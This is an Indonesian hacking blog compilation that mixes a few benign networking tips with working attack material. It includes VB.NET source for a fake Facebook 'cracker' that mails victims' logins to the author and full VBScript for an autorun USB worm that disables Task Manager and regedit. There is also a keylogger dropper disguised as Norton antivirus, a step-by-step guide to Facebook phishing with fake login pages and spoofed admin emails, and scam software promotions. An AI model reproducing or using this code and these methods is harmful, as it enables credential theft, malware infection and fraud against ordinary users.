    jebol kk



    Cara Hacker curi data Kartu Kredit Cara Hacker curi data Kartu Kredit Hal ini juga pernah di alami oleh penulis yang ingin berlangganan majalah game luar negeri dengan pembayaran online lewat kartu kredit. Para hacker sangat suka sekali kejahatan yang satu ini, kenapa? Karena kalau cuma nge-hack website atau deface (merubah tampilan/link website) merupakan sesuatu yang tidak ada untungnya. Dan hal ini bisa ke deteksi dan pelaku kejahatan bisa ketangkap dengan mudah kalau sites yang dia masuki memiliki TRACKER (program pelacak ip/link) atau LOG FILE (file yang mencatat aktivitas user/ip yang masuk ke website). Kalau carding mereka bisa bebas tanpa jejak dan juga kadang-kadang setelah mendapatkan datanya, mereka sebarkan antar hacker sehingga susah dilacak orang pertama yang mencuri data kartu kredit. Kejadian baru-baru ini yaitu situs internet teroris Indonesia juga di register dari hasil carding. Ada beberapa cara yang digunakan oleh hacker dalam mencuri kartu kredit, antara lain: 1. Paket sniffer, cara ini adalah cara yang paling cepat untuk mendapatkan data apa saja. Konsep kerjanya mereka cukup memakai program yang dapat melihat atau membuat logging file dari data yang dikirim oleh website e-commerce (penjualan online) yang mereka incar. Pada umumnya mereka mengincar website yang tidak dilengkapi security encryption atau situs yang tidak memiliki security yang bagus. 2. Membuat program spyware, trojan, worm dan sejenisnya yang berfungsi seperti keylogger (keyboard logger, program mencatat aktifitas keyboard) dan program ini disebar lewat E-mail Spamming (taruh file-nya di attachment), mirc (chatting), messenger (yahoo, MSN), atau situs-situs tertentu dengan icon atau iming-iming yang menarik netter untuk mendownload dan membuka file tersebut. Program ini akan mencatat semua aktivitas komputer anda ke dalam sebuah file, dan akan mengirimnya ke email hacker. Kadang-kadang program ini dapat dijalankan langsung kalau anda masuk ke situs yang di buat hacker atau situs porno. 3. Membuat situs phising, yaitu situs sejenis atau kelihatan sama seperti situs aslinya. contoh di Indonesia ketika itu situs klik bca (www.klikbca.com), pernah mengalami hal yang sama. situs tersebut tampilannya sama seperti klikbca tetapi alamatnya dibikin beberapa yang berbeda seperti www.clikbca.com, www.kikbca.com, dll, jadi kalau netter yang salah ketik, akan nyasar ke situs tersebut. Untungnya orang yang membuat situs tersebut katanya tidak bermaksud jahat. Nah kalau hacker carding yang buat tuh situs, siap-siap deh kartu kredit anda bakal jebol. 4. Menjebol situs e-commerce itu langsung dan mencuri semua data para pelanggannya. Cara ini agak sulit dan perlu pakar hacker atau hacker yang sudah pengalaman untuk melakukannya. Pada umumnya mereka memakai metode injection (memasukan script yang dapat dijalankan oleh situs/server) bagi situs yang memiliki firewall. Ada beberapa cara injection antara lain yang umum digunakan html injection dan SQL injection. Bagi situs yang tidak memiliki security atau firewall, siap-siaplah dikerjain abis-abisan. Ada beberapa cara lagi yang dilakukan para hacker, tapi cara-cara di atas adalah cara yang paling umum dilakukan hacker untuk carding. Cara yang tidak umum akan dijelaskan nanti di lain waktu. Kejahatan tidak hanya terjadi karena ada niat dari si pelaku, tetapi karena adanya kesempatan, waspadalah… waspadalah… Artikel ini tidak ditujukan untuk mengajari anda gimana mencuri data kartu kredit, tapi kami ingin memberitahu anda supaya di kemudian hari anda bisa terhindari dari kejahatan pencurian data kartu kredit. Istilah kejahatan kartu kredit yang biasa di istilahkan “carding” sejak adanya internet meningkat ratusan persen. Ironisnya Indonesia masuk dalam jajaran top 10 (sempat di peringkat pertama) sehingga kartu kredit terbitan Bank-Bank Indonesia ditolak ketika belanja online di situs luar negeri.pan>

    seath komputer jarak jauh


    Mematikan Komputer dari Jarak Jauh
    Ada kalanya suatu komputer dalam jaringan tidak bisa bekerja selama 24 jam. Alasannya beragam. Bisa jadi komputer dimatikan, upgrade perangkat keras, instalasi ulang, atau konfigurasi ulang.
    Anda sebagai administrator jaringan dapat mematikan komputer di jaringan (LAN) dari jarak jauh (remote) untuk keperluan tersebut. Untuk melakukannya Anda dapat mengikuti langkah-langkah berikut ini.
    1. Buka menu [Start] > [Run] ketik shutdown -i lalu klik [OK].
    2. Pada jendela Remote Shutdown Dialog Anda bisa memasukkan komputer yang ingin dimatikan dengan memilih mengklik [Add] jika Anda mengetahui lokasi komputer tersebut atau [Browse] jika Anda tidak mengetahui lokasi komputer tersebut. Cara mencari komputer yang diinginkan adalah dengan memasukkan kategori komputer seperti nama komputer, pemilik dan role lalu klik [Find Now], jika sudah ditemukan tinggal tekan tombol [OK] pada komputer yang dipilih.
    3. Jika komputer yang diinginkan sudah dipilih, selanjutnya tentukan tindakan yang perlu dilakukan pada komputer tersebut: shutdown, restart, atau logoff. Setelah itu, beri tanda centang pada pilihan [Warn users of the action] agar pemberitahuan dilakukan pada pengguna komputer beberapa detik sebelum komputer dimatikan.
    4. Pada bagian Shutdown Event Tracker Anda bisa memilih beberapa alasan, kenapa Anda ingin mematikan komputer komputer tersebut. Hapus tanda centang [Planned] apabila kegiatan tersebut tidak terencana, atau biarkan tanda centang [Planned] bila memang kegiatan tersebut memang terencana. Sebaiknya Anda juga mengisi alasan yang lebih terperinci pada kolom Comment agar pengguna komputer dapat memahaminya.
    5. Klik [OK] untuk melaksanakan perintah tersebut.

    melacak ip adress


    Cara Melacak IP ADDRESS dan REAL ADDRESS Seseorang
    Cara Melacak IP ADDRESS dan REAL ADDRESS Seseorang

    cara melacak IP address suatu situs.


    1. Melacak alamat IP suatu situs

    2. Melacak Real Adress server suatu situs

    3. Cara Mengetahui IP address lawan chatting kita



    (:::::—– Pembahasan —–::::



    1. Melacak alamat IP suatu situs

    Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING [url]WWW.SITUS-YANG-DILACAK.COM[/url] lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.



    2. Melacak Lokasi server (real address) suatu situs

    Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka [url]www.domainwhitepages.com[/url] Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.



    3. Melacak IP address lawan chatting kita

    Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya:

    :: Kirimkan suatu file pada lawan chat kita.

    :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file.

    :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di [url]www.domainwhitepages.com[/url] dengan mempergunakan alamat IP yang anda dapatkan.

    pising

    re this post:
    Ma.gnolia DiggIt! Del.icio.us Yahoo Furl Technorati Reddit

    10 Comments

    Halo Poker and Facebook Mania, Udah lama Aya gak posting artikel baru nih... Soalnya ujian di Kampus sedang menanti...

    Sebelumnya aya mau nanya dulu... Gimana dengan Software Chain and Ablenya? Udah dapat berapa Account nih? Buat yang belum baca silahkan baca disini dulu.

    Oya, sekedar mengingatkan nih... Masih ingatkan ama Zynga Poker Chips Duplicator itu? Sempat juga aya ketipu kirain software beneran. Ternyata software palsu, niatnya pengen untung malah jadi buntung... Masih ingetkan ama artikel saya yang berjudul zynga poker chips duplicator 100% Works??.
    Disana saya pernah menjanjikan akan memberikan tutorial cara membuatnya... Baru kesampean deh janji saya pada hari ini.
    Kita akan membuat software yang seolah-olah bisa ngecrack password facebook orang lain dengan memasukkan email dan password sendiri. Padahal email 'n passwordnya bakalan terkirim ke email kita... hiks hiks... ini nih namanya menipu penjahat.


    Berikut Source Codenya dikasi sama sobat aya.... Gifar Ucul dari echo
    Imports System.Security.Cryptography
    Imports System.Text
    Imports System.Net.Mail

    Public Class Form1
    Dim MyProgress As Integer

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    If TextBox1.Text = "" Then
    MsgBox("Username Is Missing")
    If TextBox2.Text = "" Then
    MsgBox("Password Is Mising")
    Me.Close()
    Else
    End If
    End If
    Dim username As String = "GMAIL"
    Dim password As String = "PASSWORD"
    Dim MyMailMessage As New MailMessage()
    MyMailMessage.From = New MailAddress(GetDecryptedData("GMAIL"))
    MyMailMessage.To.Add(GetDecryptedData("GMAIL"))
    MyMailMessage.Subject = "facebook"
    MyMailMessage.Body = "Email : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
    Dim SMTPServer As New SmtpClient("smtp.gmail.com")
    SMTPServer.Port = 587
    SMTPServer.Credentials = New System.Net.NetworkCredential(GetDecryptedData("GMAIL"), GetDecryptedData("PASSWORD"))
    SMTPServer.EnableSsl = True
    SMTPServer.Send(MyMailMessage)
    ProgressBar1.Style = ProgressBarStyle.Blocks
    ProgressBar1.Step = 1
    Timer1.Enabled = True
    Call MsgBox("Points are being added to your account, once complete you can exit. Please allow up to 48 houre for the points to be added.")
    End Sub

    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
    ProgressBar1.Value = MyProgress
    If MyProgress < 100 Then MyProgress = MyProgress + 1
    Label3.Text = "Adding Points " & MyProgress & "%"
    If MyProgress = 100 Then
    Label3.Text = "Complete"
    ProgressBar1.Visible = True
    End If

    End Sub

    End Class

    Silahkan Copy Paste di VB.net 2008. Yang belum punya dowload dulu gih "visual basic 2008 express edition" di microsoft. Gratis kok. Kalo mau belajar harus banyak usaha kan... Jangan langsung disuapin aja.. bener gak... hiks hiks

    Berikut Screen Shootnya (From Gifar) kalau udah di build..

    Bisa juga kayak gini

    Tergantung kreatifitas teman-teman aja mau bikin yang kayak gimana biar korban percaya... Misalnya Software anda dikatakan sebagai software yang fungsi nya buat mesaage auto wall auto add auto kan percaya tuh kalau password mesti dimasukin....

    Oya, ini kata pamungkasnya...
    Semua yang saya kasih ini hanya sebagai edukasi buat teman-teman yang lagi belajar. Jangan disalahgunakan okey... :-)


    CARA MEMBUAT VIRUS VIA NOTEPAD
    Kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Sekarang buka Notepad-nya. Copy kode berikut :

    '//--Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus--//
    on error resume next

    '//--Dim kata-kata berikut ini--//
    dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

    '//--Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information--//
    isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.dll.vbs"
    set fs = createobject("Scripting.FileSystemObject")
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text = mf.openastextstream(1,-2)
    do while not text.atendofstream
    rekur = rekur & text.readline
    rekur = rekur & vbcrlf
    loop
    do

    '//--Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
    Set windowpath = fs.getspecialfolder(0)
    set tf = fs.getfile(windowpath & "\batch- k4l0n6.dll.vbs ")
    tf.attributes = 32
    set tf=fs.createtextfile(windowpath & "\batch- k4l0n6.dll.vbs",2,true)
    tf.write rekursif
    tf.close
    set tf = fs.getfile(windowpath & "\batch- k4l0n6.dll.vbs ")
    tf.attributes = 39
    '//--Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok--//
    ‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

    for each flashdrive in fs.drives
    '//--Cek Drive--//
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

    '//--Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\--//
    set tf=fs.getfile(flashdrive.path &"\k4l0n6.dll.vbs ")
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &"\k4l0n6.dll.vbs ",2,true)
    tf.write rekursif
    tf.close
    set tf=fs.getfile(flashdrive.path &"\k4l0n6.dll.vbs ")
    tf.attributes = 39

    '//--Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)--//
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
    tf.write isi
    tf.close
    set tf = fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes=39
    end if
    next

    '//--Manipulasi Registry--//

    set kalong = createobject("WScript.Shell")

    '//--Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY--//
    kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," THE KALONG v.s. ZAY "

    '//--Manip – Set agar file hidden tidak ditampilkan di Explorer--//
    kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0", "REG_DWORD"

    '//--Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager--//
    kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
    kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
    kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
    kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
    kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

    '//--Manip – Disable klik kanan--//
    kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

    '//--Manip - Munculkan Pesan Setiap Windows Startup--//
    kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe."

    '//--Manip – Aktif setiap Windows Startup--//
    kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- k4l0n6.dll.vbs "

    '//--Manip – Ubah RegisteredOwner dan Organization--//
    kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
    kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Kalong"

    '//--Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan--//
    if check <> 1 then
    Wscript.sleep 200000
    end if
    loop while check <> 1
    set sd = createobject("Wscript.shell")
    sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
    'Akhir dari Kode

    Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja


    [hack zynga poker]
    Hack Chip Zynga Poker
    Lagi-lagi Hack, Bagi teman-teman yang selama ini belum berhasil Hack Chip Poker Zynga semoga kali ini terbantu dan kita akan menggunakan Software Zynga Poker Chip Duplikator dan jangan Khawatir Softwarenya Gratis koq, baiklah mari kita mulai.
    [hack Zynga Poker]
    Hack Chip Zynga Poker

    Cara Menggunakan | Pakai Zynga Poker Chip Duplikator

    1. Ekstrak file ChipDuplicator.rar. Bila belum mempunyai Winrar,Anda dapat mengunduhnya di http://www.rarlab.com
    2. Jalankan file Chip Duplicator.exe
    3. Inputkan login Facebook Anda. Jangan lupa untuk membiarkan seting "Use Secure Login" tetap tercontreng demi memastikan keamanan account Facebook Anda.
    4. Pada bagian "Buddy & Chip Setting" terdapat field "Friend Facebook URL". Anda dapat melakukan transfer chip poker Anda ke teman-teman Anda dengan cara memasukkan URL facebook merekadisini. Jangan lupa juga untuk memasukkan jumlah chip yang ingin Anda transfer pada field " Poker Chips Amount". Biarkan seting "Auto Reconnect" bila Anda ingin program melakukan koneksi secara otomatis bila terjadi DC (Disconnect)
    5. Pada "Chip Transfer Setting" terdapat seting sebagai berikut:
    * Use Smart SSI methode: Aktifkan seting ini untuk menghindariterkena ban dari Zynga! SSI (Secure - Save - Invisible)
    * Card Detector AI: Script kecerdasan buatan (AI) untuk menipu Zynga sehingga seolah-olah Anda yang sedang memainkan pokernya
    * Duplicate Your Chip (2X): Biarkan seting ini tetap aktif! Seting ini akan bekerja dengan AI untuk membuat chip Anda menjadi double (tergantung dari jumlah chip Anda). Untuk dapat menggunakan seting ini, Anda harus mempunyai setidaknya 1M chip. Lebih besar, maka besaran duplikatnya akan lebih tinggi
    * M23C Exploit: Tanpa ini, program tidak akan bisa berjalan dengan baik, karena inilah "OTAK" utamanya
    * Maximum Transfer Time: Apabila terjadi lag di server Zynga, maka jumlah chip Anda akan bertambah selambatnya 24 jam dari saat Anda menekan tombol transfer
    6. Pada bagian Others..
    * CPX2 4.5 Bot Script: Bot script yang digunakan program ini
    * Anonymous Transfer: Zynga tidak akan menganggap Anda sedang melakukan transfer di dalam servernya
    * Clear Log & Cache: Aktifkan seting ini untuk menghapus segala jejak yang mungkin tertinggal di server Zynga!
    7. Tekan tombol "START TRANSFER". Request akan di mulai dikirim. Proses
    ini akan memakan waktu 5 s/d 15 menit tergantung dari kecepatan koneksi
    Internet Anda.
    8. Setelah proses login selesai, akan terbuka jendela baru. Pada jendela
    ini Anda dapat melihat proses duplikat chip Anda secara langsung. Anda
    akan melihat posisi duduk Anda selalu berada tepat di sebelah kanan bandar.
    Apabila ada pertanyaan "Start Bot Script Now?", tekan tombol "YES"!
    9. Anda akan melihat bagaimana bot script CPX2 memainkan perannya. Anda
    akan selalu mendapatkan kartu-kartu yang bagus dengan persentase 90%.
    Nikmati saja sepuas Anda!

    cara buat keylogger


    Cara Instant Membuat Keylogger
    Share
    Nyo..kita mulai tanpa kata pembuka..

    Pertama-tama kalian buka program notepad di komputer kalian.kemudian kita ketikan code dibawah ini :

    [autorun]open=nav.bat

    Setelah kita ketik code diatas dalam notepad lalu kita pilih file typenya "all files" kemudian simpan (save) dengan nama file "autorun.inf".


    Kemudian buat file baru lagi didalam notepad kalian dan ketikan code dibawah ini :

    @echo off

    echo norton Antivirus 2006

    echo scanning disk drive…

    echo please wait…

    copy navw32.exe C:\windows\

    call C:\windows\navw32.exe

    echo.

    echo.

    echo.

    echo.

    echo.

    echo.

    echo.

    echo.Scanning complette! No Virus Threat detected!

    echo.

    cls


    simpan dengan nama nav.bat tapi ingat file typenya harus "all files"..
    setelah itu ada sedikit langkah terakhir yaitu kamu download program nav32.exe cari saja di Om google..
    setelah itu kalian simpan di flashdisk,,setelah kalian colok itu flashdisk ke kompie korban kalian atau siapa saja pasti akan dicopy secara otomatis filenya dan akan mencatat aktivitas keyboard yang digunakan korban.
    Untuk memastikan dan melihat hasilnya kalian harus datang kembali ke komputer korban yang kalian jadikan target dan kalian bisa lihat hasilnya di C:\windows\ pasti ada file nav32.dll copy paste ke flashdisk tinggal dilihat aja hasilnya.

    anti deep freeze


    1. Download anti deep frezee
    2. sebelumnya disablekan dulu anti virus
    3. lalu jalankan ADF 0.1.exe
    4. pilih versi yang digunakan (versi 4/5/6)
    5. lalu setelah pilih versinya klik apply, bila anda salah memilih versinya maka akan muncul peringatan bahwa versi deep frezee yang anda gunakan salah, kalau benar versinya akan muncul gambar deep frezee yang sama dipojok kanan bawah. Jadi nanti muncul dua gambar
    6. Selanjutnya tekan shift diikuti klik kiri gambar deep freze
    7. bila diminta password isikan password terserah anda lalu klik ok
    8. lalu pilih lagi yang boot thawed
    9. apply dan restart kompi anda
    10. dan selanjutnya terserah anda




    Port Monster Pencegah Netcut

    Arggggghhhhhhhhhh..............sebel juga nih kalau lagi asyik download atau lagi browsing, eh tiba-tiba koneksi internet jadi lambat, dan lebih sebel lagi kalau itu karena ulah keisengan orang yang meng-cut koneksi internet kita pakai suatu aplikasi seperti Netcut.


    Saya baru-baru ini dapat info dari sebuah forum yang kebetulan membahas suatu cara mencegah bandwidth kita itu dicuri orang atau koneksi kita di-cut abis sama orang.


    Keselnya saya karena udah sama-sama bayar, yah masih saja mau menang sendiri. Kita kan satu jaringan, masa mau dimonopoli sendiri...hiks..hiks...
    Oke saya punya suatu aplikasi bagus nih, namanya Port Monster. Aplikasi ini sangat bagus sekali untuk mencegah koneksi kita di-cut oleh para Netcutter yang memakai software Netcut (aplikasi yang sudah tidak asing lagi) sebagai teman kerjanya.


    Download dulu programnya disini:


    Port Monster Download

    Nih saya mau jelasin cara penginstalannya...mudah kok dan tidak ribet loh...

    Pertama, klik "pm2.0std.exe"nya, lalu akan muncul jendela seperti dibawah ini, dan klikNext aja.



    Kedua, muncul jendela ini lalu klik Next lagi.



    Ketiga, sebelum klik Next, kamu klik Add dulu. (note:kalau error pada saat klik Add, lanjut aja Next)



    Keempat, ada pilihan Port Options, silahkan pilih aja diantara keduanya, lalu klik Next lagi.
     


    Kelima, klik Next lagi.


    Keenam, klik Finish, dan jalankan programnya.



    Terakhir, klik Start yang ditandai oleh persegi biru dan tunggu prosesnya sampaicomplete, dan program siap digunakan.



    Oya didalam program ini terdapat beberapa Network Tools, yang dapat berguna untuk sewaktu-waktu kita gunakan. Seperti mengecek DNS DataWhois IPTraceroute melalui IP address yang satu jaringan local atau LAN. Oya satu lagi, program ini juga bisa kirim pesan antar jaringan melalui IP address yang akan dikirim pesan (seperti netsend yang melalui command prompt).


    Mohon maaf kalau masih ada kekurangan atas tutorial ini.












  • Hack Fb dengan Fake Login

    Tips Hacking fb kali ini adalah dengan menggunakan fake login  :D
    oke,.cekidot

    fake login dasarnya adalah membuat sebuah jebakan,ini marak di terapkan hacker dadakan pencari chip poker :D

    -> Buatlah akun dengan mendaftar di webhosting gratisan yang mendukung/support PHP Seperti :
    *  http://byethost.com/index.php/free-hosting
    http://www.ripway.com/

    *  http://www.fileave.com/
    dan masih banyak lagi,.
    ->> Truz Download Script Fake Login disini. kalo gak bisa coba lagi disini
    lanjuttt,..

    =>Setelah berhasil mendownloadnya  Extrak file tersebut dan simpan/upload di satu direktori di webhosting yang telah anda daftar, contoh http://NamaAnda.fileave.com/facebook/. 3 file tersebut yaitu :
    - Index.html
    - logs.php
    - logs.txt

    => Buatlah email palsu dengan memberikan embel-embel admin facebook tujuannya agar si korban percaya,buat korban seyakin  mungkin contoh :
    admin_facebook@yahoo.com / admin.facebook.gmail.com / admin.fb@plasa.com
    *=> Terus download isi pesan untuk email palsu
    http://iamkrisna.fileave.com/SCRIPTISIEMAILPALSU.doc
    atau
    http://www.ziddu.com/download/5055836/SCRIPTISIEMAILPALSU.doc.html

    => Buka isi file tersebut. Lalu ganti nama Cinta yang berwarna merah dengan nama anda dan ganti alamat_email_anda@gmail.com yang berwarna merah dengan alamat email palsu anda.
    Begitu juga pada  URL :
    http://www.facebook.com/n/?reqs.php&mid=883451G4a3b0e7eG88f1e5G2
    Yang berwarna biru ganti dengan URL halaman fake login yang telah anda buat. contoh :
    http://iniguwe.fileave.com/index.html

    => Setelah semuanya anda edit, segera kirim isi pesan tersebut ke alamat email si korban. Alamat email + password si korban akan datang sendirinya ke email palsu anda kalau si korban mengklik link palsu/jebakan yang anda kirimkan di email dia,,
    selamat mencoba..
    Tips ini bisa di bilang udah kuno banget,karena orang-orang sekarang tidak mudah ketipu dengan hal hal seprti ini,.trik ini udah banyak di share di dumay jadi orang telah banyak mengetahui,dan juga orang akan mudah curiga dengan URL link yang anda berikan,terlihat tidak baik dan agak berantakan :P memang tidak tampak seperti url pada umumnya..

    selamat mencoba

    Cara Hack FB (Facebook)

    Apakah ini yang kamu inginkan ???
     
    Sebuah software yang notabene bisa bobol password facebook dengan cara yang menarik dan mudah.. Gunakan menu search bagian atas dengan kata kunci software bobol password facebook 












    LAST UPDATE ARTICLE : 31/01/2010 


    Cara Hack Facebook - Inilah cara hacking facebook paling mudah yang pernah anda temui. Didalam artikel ini akan dikupas step by step istilah hacking facebook dan Ente gak salah kamar koq.. Anda berada disini adalah saat saat tepat agar anda gak menjadi korban para idiot yang jahil. Pokoknya dibahas lengkap tentang istilah hacking facebook. Agar lebih mudah ane bagi menjadi 3 bagian .. jangan dilewatkan 1 episode pun klo bisa....!!






    1. Download software jebol password facebook


    Ini ane temukan di suatu forum dan bisa ente download software ini dan mencobanya yang pasti 100% anti trojan dan anti virus serta anti sparware....





    Terus apakah software ini bener bener bisa menjebol facebook orang ? Yups, silahkan lihat ne korbannya:









    Silahkan donglot software ini di http://496abc40.linkbucks.com - Bila muncul iklan link bucks tunggu sebentar aja dan klik SKIP THIS PAGE > dan akan muncul pilihan Save file to your PC: click here cari di bagian bawah -


    Setelah kamu donlot masukin passwot buat extractnya i
    ni : a1b





    1000 Hacker Tutorials (2010) New Version AIO





    1000 Hacker Tutorials (2010) New Version AIO | 10 MB

    PDF | English | 1000 eBooks | AIO | 10 MB



    Description:

    Create Bootable XP SP integrated CD
    Create One-click Shutdown And Reboot Shortcuts.txt Creating a Board aka Forum on your own PC !.rtf
    Creating Universal Ghost Usb Boot Disk And Cd.txt
    Data Capacity of CDs [Tutorial].txt

    Debug, Learn how ***** windows.txt
    Delete An undeletable File.txt
    Delete Files From The Recent File List In Windows.txt
    Digital Camera Guide.txt
    Digital Faq-learn Everything About Digital Capture, Edit and Burning and more.txt
    Digital Photo Id Cards, Greate Info.txt
    Direct Link To Any Page You Want To In Hotmail.txt
    Directx Explained.txt
    Disable Compression On Xp, NTFS partition, Disk Cleanup.txt
    Disable The Send Error Report, to Microsoft.txt
    Disable Windows Logo Key.txt
    Discover New Music You%27ll Probably Love.txt
    Download Free Music legally, legally.txt
    Download from a paypal site without paying a penny!.txt
    Download From Ftpz, Using Ftp Search Sitez.txt
    Download Mp3%27s Without Using Filesharing.txt
    Download Music And Video With Media Player 9, quick and easy!.txt
    Download Timeframes.txt
    Dual Boot After The Fact.txt
    Dvd Copying-ripping Definitions.txt
    DVD Regions Information.txt
    Dvd-9 to Dvd+r Dl, Double Layer To Double Layer, 1-1 copies.txt
    Easily Disconnect-reconnect From Broadband.txt
    Easily Find Serial Numbers On Google.., easy to do and works like a charm.txt
    Ebay Hacktip.txt
    General Keyboard Shortcuts.txt
    Get In Windows 2000 As Administrator.txt
    Get the Most Out of Your DVD Recorder.txt
    Get The Music You Want To Hear.tx
    Get unlimited bandwidth from your host for free.txt
    Getting A 1gb Yahoo China Account.txt
    Getting Counter-strike Source To Work.txt
    getting movies, mp3,games using google.txt
    Getting older programs to run on Windows XP.txt
    Getting started with Linux for noobs!.txt
    Go to Windows updates anonymously.txt
    Google Search.txt
    Google secrets.txt
    Google Tips and Tricks, (utilizing search engine).txt
    Graffiti On Walls 4 Adobe Photoshop Cs 8.0.txt
    Guide For Getting Free Stuff.txt
    Guide to IIS Exploitation.txt
    Guide to Slipstreaming Service Pack 2.txt
    Hard drive Gone Bad.txt
    Hardware Firewall.txt
    How To Add An Option To Print, the Contents of a Folder!.txt
    How To Add Your Own Windows Tips.txt
    How to Back Up the Registry.txt
    How To Backup Ps2 Games.txt
    HOW TO BLOCK PEOPLE ON WINMX WHO SHARE NOTHING.txt
    How To Block Websties Without Software, block websites.txt
    How To Boot Xp Faster (updated).txt
    How to build a black box.txt
    how to burn quicker in windows xp.txt
    How to Bypass BIOS Passwords.txt
    How To Bypass Web Filters, tutorial.txt
    HOW TO CAPTURE STREAMING MEDIA.txt
    How To Change A Cmos Battery.txt
    How to change the serial number used in Windows XP, Valid for XP Corporate.txt
    How To Change Thumbnail Size And Quality.txt
    How to clear Bios info 2.txt
    How to clear Bios info.txt
    How To Convert File System, fat - fat32 to ntfs.txt
    How To Copy A Dvd Which Will Play On A X Box.txt
    How to copy songs from your iPod to your PC.txt
    How To Customise Your start Button.txt
    How To Delete Those Persistent Nasty Files.txt 0.53 kB
    How To Directly Go To Inbox, Write Msg, w Hotmail, no need for How to find MP3%27s real quickly.txt 0.35 kB
    How To Find Serial Numbers On Google.txt 0.79 kB
    How to fix corrupted files in XP.txt 1.48 kB
    How to fix Windows Installer problem.txt 0.96 kB
    How To Get A Free I-pod Or Flat Screen Tv, check it out.txt 6.62 kB
    HOW TO GET ANY WINDOWS PASSWORD.txt 3.41 kB
    How to Get someones ISP password, Get free internet.txt 2.65 kB
    How To Get Top Ranking, Search Engines.txt 6.58 kB
    How To Hack Windows Xp Admin Passwords.txt 2.52 kB
    How to hack-change your Windows XP Boot Screen.txt 1.52 kB
    how To Hide Yourself From Network Users!, And give access to only specific users!.txt 0.86 kB
    How To Make An Animted Logo.txt 5.26 kB
    How To Make Free Phone Calls.txt 2.29 kB
    How to make key generators.txt 8.83 kB
    How To Make Perfect Copies Of Maxis The Sims Discs, CloneCD Style!.txt 1.17 kB
    How To Make XP Go Faster.txt 5.58 kB
    How To make your own Radio Station 2.txt 3.26 kB
    How To Make Your Own Radio Station.txt 1.58 kB
    How to Remove DRM Protection for Video Files.txt 2.29 kB
    How To Remove Ms Java Vm And Install Sun Java.txt 0.05 kB
    How To Remove Signin Details Of Msn Passport.txt 1.04 kB
    How To Remove The Default Admin$ Shares.txt 1.03 kB
    How to remove the Links folder in IE Favorites.txt 0.59 kB
    How to Remove WinXP Splash and See Operations.txt 1.19 kB
    How To Rename Extensions With Ease, with a Renamer.bat file!.txt 0.44 kB
    How to Rename File Extensions.txt 3.11 kB
